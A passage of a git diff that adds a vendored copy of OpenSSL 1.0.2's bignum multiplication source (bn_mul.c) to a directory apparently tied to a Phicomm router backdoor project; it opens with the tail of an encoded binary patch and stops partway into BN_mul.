z-|oXxz;S#&F5P!vhx)`H@5A*zyxfNq!_q6YvRowTBf4QtfKT-4>}*=e>a$Z*^J-4d
zDe0`LW54BAbffIlS*%gE(1Vl-!y@Y3oL+Ms-L&nhO{2|EX<*sHZU`(cngtsNfLeBd
zqTt<q5%kH1FS7_ikPm@!ei0!EatW04RfHhOqoADsgAfEco)724?8gjwaNe;1$J%&&
z9DEdbXH;neK3V2)&d-g=^`(kaFu*#tZ%f>>&BcQ3m}eX!pDZ{9A{+HOk&D$z#k7D~
zRmYU!P4BBah2m+}{>XCWnq94#wzEWJI)Yi!PuYcv$xHcPHV)ai^zN6F0*11m?Tg>?
zW4VuZ6cqO|1saqRLXaPQL-76JP!ZN1VRkp;-7me`H7^Sfyg;Aq1%qS$*Zd^p;#3LH
zpz!(k1R?mmEN%}5STOW^9uR~*V)1?BuM^&*p!~q{<3R{M-#?BGa4@txzs>TOc_6dh
z`3t~%onMUozw>>;^TS-8&(E*d+&EQ=6|}<Yz_+%&M?SLdvjapPF!%{J0>XxSM)0ln
P%1^QS7oSD?PIvylC{rzB

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/bn_mul.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/bn_mul.c
new file mode 100644
index 0000000..b174850
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/bn_mul.c
@@ -0,0 +1,1164 @@
+/* crypto/bn/bn_mul.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#ifndef BN_DEBUG
+# undef NDEBUG                  /* avoid conflicting definitions */
+# define NDEBUG
+#endif
+
+#include <stdio.h>
+#include <assert.h>
+#include "cryptlib.h"
+#include "bn_lcl.h"
+
+#if defined(OPENSSL_NO_ASM) || !defined(OPENSSL_BN_ASM_PART_WORDS)
+/*
+ * Here follows specialised variants of bn_add_words() and bn_sub_words().
+ * They have the property performing operations on arrays of different sizes.
+ * The sizes of those arrays is expressed through cl, which is the common
+ * length ( basicall, min(len(a),len(b)) ), and dl, which is the delta
+ * between the two lengths, calculated as len(a)-len(b). All lengths are the
+ * number of BN_ULONGs...  For the operations that require a result array as
+ * parameter, it must have the length cl+abs(dl). These functions should
+ * probably end up in bn_asm.c as soon as there are assembler counterparts
+ * for the systems that use assembler files.
+ */
+
+BN_ULONG bn_sub_part_words(BN_ULONG *r,
+                           const BN_ULONG *a, const BN_ULONG *b,
+                           int cl, int dl)
+{
+    BN_ULONG c, t;
+
+    assert(cl >= 0);
+    c = bn_sub_words(r, a, b, cl);
+
+    if (dl == 0)
+        return c;
+
+    r += cl;
+    a += cl;
+    b += cl;
+
+    if (dl < 0) {
+# ifdef BN_COUNT
+        fprintf(stderr, "  bn_sub_part_words %d + %d (dl < 0, c = %d)\n", cl,
+                dl, c);
+# endif
+        for (;;) {
+            t = b[0];
+            r[0] = (0 - t - c) & BN_MASK2;
+            if (t != 0)
+                c = 1;
+            if (++dl >= 0)
+                break;
+
+            t = b[1];
+            r[1] = (0 - t - c) & BN_MASK2;
+            if (t != 0)
+                c = 1;
+            if (++dl >= 0)
+                break;
+
+            t = b[2];
+            r[2] = (0 - t - c) & BN_MASK2;
+            if (t != 0)
+                c = 1;
+            if (++dl >= 0)
+                break;
+
+            t = b[3];
+            r[3] = (0 - t - c) & BN_MASK2;
+            if (t != 0)
+                c = 1;
+            if (++dl >= 0)
+                break;
+
+            b += 4;
+            r += 4;
+        }
+    } else {
+        int save_dl = dl;
+# ifdef BN_COUNT
+        fprintf(stderr, "  bn_sub_part_words %d + %d (dl > 0, c = %d)\n", cl,
+                dl, c);
+# endif
+        while (c) {
+            t = a[0];
+            r[0] = (t - c) & BN_MASK2;
+            if (t != 0)
+                c = 0;
+            if (--dl <= 0)
+                break;
+
+            t = a[1];
+            r[1] = (t - c) & BN_MASK2;
+            if (t != 0)
+                c = 0;
+            if (--dl <= 0)
+                break;
+
+            t = a[2];
+            r[2] = (t - c) & BN_MASK2;
+            if (t != 0)
+                c = 0;
+            if (--dl <= 0)
+                break;
+
+            t = a[3];
+            r[3] = (t - c) & BN_MASK2;
+            if (t != 0)
+                c = 0;
+            if (--dl <= 0)
+                break;
+
+            save_dl = dl;
+            a += 4;
+            r += 4;
+        }
+        if (dl > 0) {
+# ifdef BN_COUNT
+            fprintf(stderr, "  bn_sub_part_words %d + %d (dl > 0, c == 0)\n",
+                    cl, dl);
+# endif
+            if (save_dl > dl) {
+                switch (save_dl - dl) {
+                case 1:
+                    r[1] = a[1];
+                    if (--dl <= 0)
+                        break;
+                case 2:
+                    r[2] = a[2];
+                    if (--dl <= 0)
+                        break;
+                case 3:
+                    r[3] = a[3];
+                    if (--dl <= 0)
+                        break;
+                }
+                a += 4;
+                r += 4;
+            }
+        }
+        if (dl > 0) {
+# ifdef BN_COUNT
+            fprintf(stderr, "  bn_sub_part_words %d + %d (dl > 0, copy)\n",
+                    cl, dl);
+# endif
+            for (;;) {
+                r[0] = a[0];
+                if (--dl <= 0)
+                    break;
+                r[1] = a[1];
+                if (--dl <= 0)
+                    break;
+                r[2] = a[2];
+                if (--dl <= 0)
+                    break;
+                r[3] = a[3];
+                if (--dl <= 0)
+                    break;
+
+                a += 4;
+                r += 4;
+            }
+        }
+    }
+    return c;
+}
+#endif
+
+BN_ULONG bn_add_part_words(BN_ULONG *r,
+                           const BN_ULONG *a, const BN_ULONG *b,
+                           int cl, int dl)
+{
+    BN_ULONG c, l, t;
+
+    assert(cl >= 0);
+    c = bn_add_words(r, a, b, cl);
+
+    if (dl == 0)
+        return c;
+
+    r += cl;
+    a += cl;
+    b += cl;
+
+    if (dl < 0) {
+        int save_dl = dl;
+#ifdef BN_COUNT
+        fprintf(stderr, "  bn_add_part_words %d + %d (dl < 0, c = %d)\n", cl,
+                dl, c);
+#endif
+        while (c) {
+            l = (c + b[0]) & BN_MASK2;
+            c = (l < c);
+            r[0] = l;
+            if (++dl >= 0)
+                break;
+
+            l = (c + b[1]) & BN_MASK2;
+            c = (l < c);
+            r[1] = l;
+            if (++dl >= 0)
+                break;
+
+            l = (c + b[2]) & BN_MASK2;
+            c = (l < c);
+            r[2] = l;
+            if (++dl >= 0)
+                break;
+
+            l = (c + b[3]) & BN_MASK2;
+            c = (l < c);
+            r[3] = l;
+            if (++dl >= 0)
+                break;
+
+            save_dl = dl;
+            b += 4;
+            r += 4;
+        }
+        if (dl < 0) {
+#ifdef BN_COUNT
+            fprintf(stderr, "  bn_add_part_words %d + %d (dl < 0, c == 0)\n",
+                    cl, dl);
+#endif
+            if (save_dl < dl) {
+                switch (dl - save_dl) {
+                case 1:
+                    r[1] = b[1];
+                    if (++dl >= 0)
+                        break;
+                case 2:
+                    r[2] = b[2];
+                    if (++dl >= 0)
+                        break;
+                case 3:
+                    r[3] = b[3];
+                    if (++dl >= 0)
+                        break;
+                }
+                b += 4;
+                r += 4;
+            }
+        }
+        if (dl < 0) {
+#ifdef BN_COUNT
+            fprintf(stderr, "  bn_add_part_words %d + %d (dl < 0, copy)\n",
+                    cl, dl);
+#endif
+            for (;;) {
+                r[0] = b[0];
+                if (++dl >= 0)
+                    break;
+                r[1] = b[1];
+                if (++dl >= 0)
+                    break;
+                r[2] = b[2];
+                if (++dl >= 0)
+                    break;
+                r[3] = b[3];
+                if (++dl >= 0)
+                    break;
+
+                b += 4;
+                r += 4;
+            }
+        }
+    } else {
+        int save_dl = dl;
+#ifdef BN_COUNT
+        fprintf(stderr, "  bn_add_part_words %d + %d (dl > 0)\n", cl, dl);
+#endif
+        while (c) {
+            t = (a[0] + c) & BN_MASK2;
+            c = (t < c);
+            r[0] = t;
+            if (--dl <= 0)
+                break;
+
+            t = (a[1] + c) & BN_MASK2;
+            c = (t < c);
+            r[1] = t;
+            if (--dl <= 0)
+                break;
+
+            t = (a[2] + c) & BN_MASK2;
+            c = (t < c);
+            r[2] = t;
+            if (--dl <= 0)
+                break;
+
+            t = (a[3] + c) & BN_MASK2;
+            c = (t < c);
+            r[3] = t;
+            if (--dl <= 0)
+                break;
+
+            save_dl = dl;
+            a += 4;
+            r += 4;
+        }
+#ifdef BN_COUNT
+        fprintf(stderr, "  bn_add_part_words %d + %d (dl > 0, c == 0)\n", cl,
+                dl);
+#endif
+        if (dl > 0) {
+            if (save_dl > dl) {
+                switch (save_dl - dl) {
+                case 1:
+                    r[1] = a[1];
+                    if (--dl <= 0)
+                        break;
+                case 2:
+                    r[2] = a[2];
+                    if (--dl <= 0)
+                        break;
+                case 3:
+                    r[3] = a[3];
+                    if (--dl <= 0)
+                        break;
+                }
+                a += 4;
+                r += 4;
+            }
+        }
+        if (dl > 0) {
+#ifdef BN_COUNT
+            fprintf(stderr, "  bn_add_part_words %d + %d (dl > 0, copy)\n",
+                    cl, dl);
+#endif
+            for (;;) {
+                r[0] = a[0];
+                if (--dl <= 0)
+                    break;
+                r[1] = a[1];
+                if (--dl <= 0)
+                    break;
+                r[2] = a[2];
+                if (--dl <= 0)
+                    break;
+                r[3] = a[3];
+                if (--dl <= 0)
+                    break;
+
+                a += 4;
+                r += 4;
+            }
+        }
+    }
+    return c;
+}
+
+#ifdef BN_RECURSION
+/*
+ * Karatsuba recursive multiplication algorithm (cf. Knuth, The Art of
+ * Computer Programming, Vol. 2)
+ */
+
+/*-
+ * r is 2*n2 words in size,
+ * a and b are both n2 words in size.
+ * n2 must be a power of 2.
+ * We multiply and return the result.
+ * t must be 2*n2 words in size
+ * We calculate
+ * a[0]*b[0]
+ * a[0]*b[0]+a[1]*b[1]+(a[0]-a[1])*(b[1]-b[0])
+ * a[1]*b[1]
+ */
+/* dnX may not be positive, but n2/2+dnX has to be */
+void bn_mul_recursive(BN_ULONG *r, BN_ULONG *a, BN_ULONG *b, int n2,
+                      int dna, int dnb, BN_ULONG *t)
+{
+    int n = n2 / 2, c1, c2;
+    int tna = n + dna, tnb = n + dnb;
+    unsigned int neg, zero;
+    BN_ULONG ln, lo, *p;
+
+# ifdef BN_COUNT
+    fprintf(stderr, " bn_mul_recursive %d%+d * %d%+d\n", n2, dna, n2, dnb);
+# endif
+# ifdef BN_MUL_COMBA
+#  if 0
+    if (n2 == 4) {
+        bn_mul_comba4(r, a, b);
+        return;
+    }
+#  endif
+    /*
+     * Only call bn_mul_comba 8 if n2 == 8 and the two arrays are complete
+     * [steve]
+     */
+    if (n2 == 8 && dna == 0 && dnb == 0) {
+        bn_mul_comba8(r, a, b);
+        return;
+    }
+# endif                         /* BN_MUL_COMBA */
+    /* Else do normal multiply */
+    if (n2 < BN_MUL_RECURSIVE_SIZE_NORMAL) {
+        bn_mul_normal(r, a, n2 + dna, b, n2 + dnb);
+        if ((dna + dnb) < 0)
+            memset(&r[2 * n2 + dna + dnb], 0,
+                   sizeof(BN_ULONG) * -(dna + dnb));
+        return;
+    }
+    /* r=(a[0]-a[1])*(b[1]-b[0]) */
+    c1 = bn_cmp_part_words(a, &(a[n]), tna, n - tna);
+    c2 = bn_cmp_part_words(&(b[n]), b, tnb, tnb - n);
+    zero = neg = 0;
+    switch (c1 * 3 + c2) {
+    case -4:
+        bn_sub_part_words(t, &(a[n]), a, tna, tna - n); /* - */
+        bn_sub_part_words(&(t[n]), b, &(b[n]), tnb, n - tnb); /* - */
+        break;
+    case -3:
+        zero = 1;
+        break;
+    case -2:
+        bn_sub_part_words(t, &(a[n]), a, tna, tna - n); /* - */
+        bn_sub_part_words(&(t[n]), &(b[n]), b, tnb, tnb - n); /* + */
+        neg = 1;
+        break;
+    case -1:
+    case 0:
+    case 1:
+        zero = 1;
+        break;
+    case 2:
+        bn_sub_part_words(t, a, &(a[n]), tna, n - tna); /* + */
+        bn_sub_part_words(&(t[n]), b, &(b[n]), tnb, n - tnb); /* - */
+        neg = 1;
+        break;
+    case 3:
+        zero = 1;
+        break;
+    case 4:
+        bn_sub_part_words(t, a, &(a[n]), tna, n - tna);
+        bn_sub_part_words(&(t[n]), &(b[n]), b, tnb, tnb - n);
+        break;
+    }
+
+# ifdef BN_MUL_COMBA
+    if (n == 4 && dna == 0 && dnb == 0) { /* XXX: bn_mul_comba4 could take
+                                           * extra args to do this well */
+        if (!zero)
+            bn_mul_comba4(&(t[n2]), t, &(t[n]));
+        else
+            memset(&(t[n2]), 0, 8 * sizeof(BN_ULONG));
+
+        bn_mul_comba4(r, a, b);
+        bn_mul_comba4(&(r[n2]), &(a[n]), &(b[n]));
+    } else if (n == 8 && dna == 0 && dnb == 0) { /* XXX: bn_mul_comba8 could
+                                                  * take extra args to do
+                                                  * this well */
+        if (!zero)
+            bn_mul_comba8(&(t[n2]), t, &(t[n]));
+        else
+            memset(&(t[n2]), 0, 16 * sizeof(BN_ULONG));
+
+        bn_mul_comba8(r, a, b);
+        bn_mul_comba8(&(r[n2]), &(a[n]), &(b[n]));
+    } else
+# endif                         /* BN_MUL_COMBA */
+    {
+        p = &(t[n2 * 2]);
+        if (!zero)
+            bn_mul_recursive(&(t[n2]), t, &(t[n]), n, 0, 0, p);
+        else
+            memset(&(t[n2]), 0, n2 * sizeof(BN_ULONG));
+        bn_mul_recursive(r, a, b, n, 0, 0, p);
+        bn_mul_recursive(&(r[n2]), &(a[n]), &(b[n]), n, dna, dnb, p);
+    }
+
+    /*-
+     * t[32] holds (a[0]-a[1])*(b[1]-b[0]), c1 is the sign
+     * r[10] holds (a[0]*b[0])
+     * r[32] holds (b[1]*b[1])
+     */
+
+    c1 = (int)(bn_add_words(t, r, &(r[n2]), n2));
+
+    if (neg) {                  /* if t[32] is negative */
+        c1 -= (int)(bn_sub_words(&(t[n2]), t, &(t[n2]), n2));
+    } else {
+        /* Might have a carry */
+        c1 += (int)(bn_add_words(&(t[n2]), &(t[n2]), t, n2));
+    }
+
+    /*-
+     * t[32] holds (a[0]-a[1])*(b[1]-b[0])+(a[0]*b[0])+(a[1]*b[1])
+     * r[10] holds (a[0]*b[0])
+     * r[32] holds (b[1]*b[1])
+     * c1 holds the carry bits
+     */
+    c1 += (int)(bn_add_words(&(r[n]), &(r[n]), &(t[n2]), n2));
+    if (c1) {
+        p = &(r[n + n2]);
+        lo = *p;
+        ln = (lo + c1) & BN_MASK2;
+        *p = ln;
+
+        /*
+         * The overflow will stop before we over write words we should not
+         * overwrite
+         */
+        if (ln < (BN_ULONG)c1) {
+            do {
+                p++;
+                lo = *p;
+                ln = (lo + 1) & BN_MASK2;
+                *p = ln;
+            } while (ln == 0);
+        }
+    }
+}
+
+/*
+ * n+tn is the word length t needs to be n*4 is size, as does r
+ */
+/* tnX may not be negative but less than n */
+void bn_mul_part_recursive(BN_ULONG *r, BN_ULONG *a, BN_ULONG *b, int n,
+                           int tna, int tnb, BN_ULONG *t)
+{
+    int i, j, n2 = n * 2;
+    int c1, c2, neg;
+    BN_ULONG ln, lo, *p;
+
+# ifdef BN_COUNT
+    fprintf(stderr, " bn_mul_part_recursive (%d%+d) * (%d%+d)\n",
+            n, tna, n, tnb);
+# endif
+    if (n < 8) {
+        bn_mul_normal(r, a, n + tna, b, n + tnb);
+        return;
+    }
+
+    /* r=(a[0]-a[1])*(b[1]-b[0]) */
+    c1 = bn_cmp_part_words(a, &(a[n]), tna, n - tna);
+    c2 = bn_cmp_part_words(&(b[n]), b, tnb, tnb - n);
+    neg = 0;
+    switch (c1 * 3 + c2) {
+    case -4:
+        bn_sub_part_words(t, &(a[n]), a, tna, tna - n); /* - */
+        bn_sub_part_words(&(t[n]), b, &(b[n]), tnb, n - tnb); /* - */
+        break;
+    case -3:
+        /* break; */
+    case -2:
+        bn_sub_part_words(t, &(a[n]), a, tna, tna - n); /* - */
+        bn_sub_part_words(&(t[n]), &(b[n]), b, tnb, tnb - n); /* + */
+        neg = 1;
+        break;
+    case -1:
+    case 0:
+    case 1:
+        /* break; */
+    case 2:
+        bn_sub_part_words(t, a, &(a[n]), tna, n - tna); /* + */
+        bn_sub_part_words(&(t[n]), b, &(b[n]), tnb, n - tnb); /* - */
+        neg = 1;
+        break;
+    case 3:
+        /* break; */
+    case 4:
+        bn_sub_part_words(t, a, &(a[n]), tna, n - tna);
+        bn_sub_part_words(&(t[n]), &(b[n]), b, tnb, tnb - n);
+        break;
+    }
+    /*
+     * The zero case isn't yet implemented here. The speedup would probably
+     * be negligible.
+     */
+# if 0
+    if (n == 4) {
+        bn_mul_comba4(&(t[n2]), t, &(t[n]));
+        bn_mul_comba4(r, a, b);
+        bn_mul_normal(&(r[n2]), &(a[n]), tn, &(b[n]), tn);
+        memset(&(r[n2 + tn * 2]), 0, sizeof(BN_ULONG) * (n2 - tn * 2));
+    } else
+# endif
+    if (n == 8) {
+        bn_mul_comba8(&(t[n2]), t, &(t[n]));
+        bn_mul_comba8(r, a, b);
+        bn_mul_normal(&(r[n2]), &(a[n]), tna, &(b[n]), tnb);
+        memset(&(r[n2 + tna + tnb]), 0, sizeof(BN_ULONG) * (n2 - tna - tnb));
+    } else {
+        p = &(t[n2 * 2]);
+        bn_mul_recursive(&(t[n2]), t, &(t[n]), n, 0, 0, p);
+        bn_mul_recursive(r, a, b, n, 0, 0, p);
+        i = n / 2;
+        /*
+         * If there is only a bottom half to the number, just do it
+         */
+        if (tna > tnb)
+            j = tna - i;
+        else
+            j = tnb - i;
+        if (j == 0) {
+            bn_mul_recursive(&(r[n2]), &(a[n]), &(b[n]),
+                             i, tna - i, tnb - i, p);
+            memset(&(r[n2 + i * 2]), 0, sizeof(BN_ULONG) * (n2 - i * 2));
+        } else if (j > 0) {     /* eg, n == 16, i == 8 and tn == 11 */
+            bn_mul_part_recursive(&(r[n2]), &(a[n]), &(b[n]),
+                                  i, tna - i, tnb - i, p);
+            memset(&(r[n2 + tna + tnb]), 0,
+                   sizeof(BN_ULONG) * (n2 - tna - tnb));
+        } else {                /* (j < 0) eg, n == 16, i == 8 and tn == 5 */
+
+            memset(&(r[n2]), 0, sizeof(BN_ULONG) * n2);
+            if (tna < BN_MUL_RECURSIVE_SIZE_NORMAL
+                && tnb < BN_MUL_RECURSIVE_SIZE_NORMAL) {
+                bn_mul_normal(&(r[n2]), &(a[n]), tna, &(b[n]), tnb);
+            } else {
+                for (;;) {
+                    i /= 2;
+                    /*
+                     * these simplified conditions work exclusively because
+                     * difference between tna and tnb is 1 or 0
+                     */
+                    if (i < tna || i < tnb) {
+                        bn_mul_part_recursive(&(r[n2]),
+                                              &(a[n]), &(b[n]),
+                                              i, tna - i, tnb - i, p);
+                        break;
+                    } else if (i == tna || i == tnb) {
+                        bn_mul_recursive(&(r[n2]),
+                                         &(a[n]), &(b[n]),
+                                         i, tna - i, tnb - i, p);
+                        break;
+                    }
+                }
+            }
+        }
+    }
+
+    /*-
+     * t[32] holds (a[0]-a[1])*(b[1]-b[0]), c1 is the sign
+     * r[10] holds (a[0]*b[0])
+     * r[32] holds (b[1]*b[1])
+     */
+
+    c1 = (int)(bn_add_words(t, r, &(r[n2]), n2));
+
+    if (neg) {                  /* if t[32] is negative */
+        c1 -= (int)(bn_sub_words(&(t[n2]), t, &(t[n2]), n2));
+    } else {
+        /* Might have a carry */
+        c1 += (int)(bn_add_words(&(t[n2]), &(t[n2]), t, n2));
+    }
+
+    /*-
+     * t[32] holds (a[0]-a[1])*(b[1]-b[0])+(a[0]*b[0])+(a[1]*b[1])
+     * r[10] holds (a[0]*b[0])
+     * r[32] holds (b[1]*b[1])
+     * c1 holds the carry bits
+     */
+    c1 += (int)(bn_add_words(&(r[n]), &(r[n]), &(t[n2]), n2));
+    if (c1) {
+        p = &(r[n + n2]);
+        lo = *p;
+        ln = (lo + c1) & BN_MASK2;
+        *p = ln;
+
+        /*
+         * The overflow will stop before we over write words we should not
+         * overwrite
+         */
+        if (ln < (BN_ULONG)c1) {
+            do {
+                p++;
+                lo = *p;
+                ln = (lo + 1) & BN_MASK2;
+                *p = ln;
+            } while (ln == 0);
+        }
+    }
+}
+
+/*-
+ * a and b must be the same size, which is n2.
+ * r needs to be n2 words and t needs to be n2*2
+ */
+void bn_mul_low_recursive(BN_ULONG *r, BN_ULONG *a, BN_ULONG *b, int n2,
+                          BN_ULONG *t)
+{
+    int n = n2 / 2;
+
+# ifdef BN_COUNT
+    fprintf(stderr, " bn_mul_low_recursive %d * %d\n", n2, n2);
+# endif
+
+    bn_mul_recursive(r, a, b, n, 0, 0, &(t[0]));
+    if (n >= BN_MUL_LOW_RECURSIVE_SIZE_NORMAL) {
+        bn_mul_low_recursive(&(t[0]), &(a[0]), &(b[n]), n, &(t[n2]));
+        bn_add_words(&(r[n]), &(r[n]), &(t[0]), n);
+        bn_mul_low_recursive(&(t[0]), &(a[n]), &(b[0]), n, &(t[n2]));
+        bn_add_words(&(r[n]), &(r[n]), &(t[0]), n);
+    } else {
+        bn_mul_low_normal(&(t[0]), &(a[0]), &(b[n]), n);
+        bn_mul_low_normal(&(t[n]), &(a[n]), &(b[0]), n);
+        bn_add_words(&(r[n]), &(r[n]), &(t[0]), n);
+        bn_add_words(&(r[n]), &(r[n]), &(t[n]), n);
+    }
+}
+
+/*-
+ * a and b must be the same size, which is n2.
+ * r needs to be n2 words and t needs to be n2*2
+ * l is the low words of the output.
+ * t needs to be n2*3
+ */
+void bn_mul_high(BN_ULONG *r, BN_ULONG *a, BN_ULONG *b, BN_ULONG *l, int n2,
+                 BN_ULONG *t)
+{
+    int i, n;
+    int c1, c2;
+    int neg, oneg, zero;
+    BN_ULONG ll, lc, *lp, *mp;
+
+# ifdef BN_COUNT
+    fprintf(stderr, " bn_mul_high %d * %d\n", n2, n2);
+# endif
+    n = n2 / 2;
+
+    /* Calculate (al-ah)*(bh-bl) */
+    neg = zero = 0;
+    c1 = bn_cmp_words(&(a[0]), &(a[n]), n);
+    c2 = bn_cmp_words(&(b[n]), &(b[0]), n);
+    switch (c1 * 3 + c2) {
+    case -4:
+        bn_sub_words(&(r[0]), &(a[n]), &(a[0]), n);
+        bn_sub_words(&(r[n]), &(b[0]), &(b[n]), n);
+        break;
+    case -3:
+        zero = 1;
+        break;
+    case -2:
+        bn_sub_words(&(r[0]), &(a[n]), &(a[0]), n);
+        bn_sub_words(&(r[n]), &(b[n]), &(b[0]), n);
+        neg = 1;
+        break;
+    case -1:
+    case 0:
+    case 1:
+        zero = 1;
+        break;
+    case 2:
+        bn_sub_words(&(r[0]), &(a[0]), &(a[n]), n);
+        bn_sub_words(&(r[n]), &(b[0]), &(b[n]), n);
+        neg = 1;
+        break;
+    case 3:
+        zero = 1;
+        break;
+    case 4:
+        bn_sub_words(&(r[0]), &(a[0]), &(a[n]), n);
+        bn_sub_words(&(r[n]), &(b[n]), &(b[0]), n);
+        break;
+    }
+
+    oneg = neg;
+    /* t[10] = (a[0]-a[1])*(b[1]-b[0]) */
+    /* r[10] = (a[1]*b[1]) */
+# ifdef BN_MUL_COMBA
+    if (n == 8) {
+        bn_mul_comba8(&(t[0]), &(r[0]), &(r[n]));
+        bn_mul_comba8(r, &(a[n]), &(b[n]));
+    } else
+# endif
+    {
+        bn_mul_recursive(&(t[0]), &(r[0]), &(r[n]), n, 0, 0, &(t[n2]));
+        bn_mul_recursive(r, &(a[n]), &(b[n]), n, 0, 0, &(t[n2]));
+    }
+
+    /*-
+     * s0 == low(al*bl)
+     * s1 == low(ah*bh)+low((al-ah)*(bh-bl))+low(al*bl)+high(al*bl)
+     * We know s0 and s1 so the only unknown is high(al*bl)
+     * high(al*bl) == s1 - low(ah*bh+s0+(al-ah)*(bh-bl))
+     * high(al*bl) == s1 - (r[0]+l[0]+t[0])
+     */
+    if (l != NULL) {
+        lp = &(t[n2 + n]);
+        c1 = (int)(bn_add_words(lp, &(r[0]), &(l[0]), n));
+    } else {
+        c1 = 0;
+        lp = &(r[0]);
+    }
+
+    if (neg)
+        neg = (int)(bn_sub_words(&(t[n2]), lp, &(t[0]), n));
+    else {
+        bn_add_words(&(t[n2]), lp, &(t[0]), n);
+        neg = 0;
+    }
+
+    if (l != NULL) {
+        bn_sub_words(&(t[n2 + n]), &(l[n]), &(t[n2]), n);
+    } else {
+        lp = &(t[n2 + n]);
+        mp = &(t[n2]);
+        for (i = 0; i < n; i++)
+            lp[i] = ((~mp[i]) + 1) & BN_MASK2;
+    }
+
+    /*-
+     * s[0] = low(al*bl)
+     * t[3] = high(al*bl)
+     * t[10] = (a[0]-a[1])*(b[1]-b[0]) neg is the sign
+     * r[10] = (a[1]*b[1])
+     */
+    /*-
+     * R[10] = al*bl
+     * R[21] = al*bl + ah*bh + (a[0]-a[1])*(b[1]-b[0])
+     * R[32] = ah*bh
+     */
+    /*-
+     * R[1]=t[3]+l[0]+r[0](+-)t[0] (have carry/borrow)
+     * R[2]=r[0]+t[3]+r[1](+-)t[1] (have carry/borrow)
+     * R[3]=r[1]+(carry/borrow)
+     */
+    if (l != NULL) {
+        lp = &(t[n2]);
+        c1 = (int)(bn_add_words(lp, &(t[n2 + n]), &(l[0]), n));
+    } else {
+        lp = &(t[n2 + n]);
+        c1 = 0;
+    }
+    c1 += (int)(bn_add_words(&(t[n2]), lp, &(r[0]), n));
+    if (oneg)
+        c1 -= (int)(bn_sub_words(&(t[n2]), &(t[n2]), &(t[0]), n));
+    else
+        c1 += (int)(bn_add_words(&(t[n2]), &(t[n2]), &(t[0]), n));
+
+    c2 = (int)(bn_add_words(&(r[0]), &(r[0]), &(t[n2 + n]), n));
+    c2 += (int)(bn_add_words(&(r[0]), &(r[0]), &(r[n]), n));
+    if (oneg)
+        c2 -= (int)(bn_sub_words(&(r[0]), &(r[0]), &(t[n]), n));
+    else
+        c2 += (int)(bn_add_words(&(r[0]), &(r[0]), &(t[n]), n));
+
+    if (c1 != 0) {              /* Add starting at r[0], could be +ve or -ve */
+        i = 0;
+        if (c1 > 0) {
+            lc = c1;
+            do {
+                ll = (r[i] + lc) & BN_MASK2;
+                r[i++] = ll;
+                lc = (lc > ll);
+            } while (lc);
+        } else {
+            lc = -c1;
+            do {
+                ll = r[i];
+                r[i++] = (ll - lc) & BN_MASK2;
+                lc = (lc > ll);
+            } while (lc);
+        }
+    }
+    if (c2 != 0) {              /* Add starting at r[1] */
+        i = n;
+        if (c2 > 0) {
+            lc = c2;
+            do {
+                ll = (r[i] + lc) & BN_MASK2;
+                r[i++] = ll;
+                lc = (lc > ll);
+            } while (lc);
+        } else {
+            lc = -c2;
+            do {
+                ll = r[i];
+                r[i++] = (ll - lc) & BN_MASK2;
+                lc = (lc > ll);
+            } while (lc);
+        }
+    }
+}
+#endif                          /* BN_RECURSION */
+
+int BN_mul(BIGNUM *r, const BIGNUM *a, const BIGNUM *b, BN_CTX *ctx)
+{
+    int ret = 0;
+    int top, al, bl;
+    BIGNUM *rr;
+#if defined(BN_MUL_COMBA) || defined(BN_RECURSION)
+    int i;
+#endif
+#ifdef BN_RECURSION
+    BIGNUM *t = NULL;
+    int j = 0, k;
+#endif
+
+#ifdef BN_COUNT
+    fprintf(stderr, "BN_mul %d * %d\n", a->top, b->top);
+#endif
+
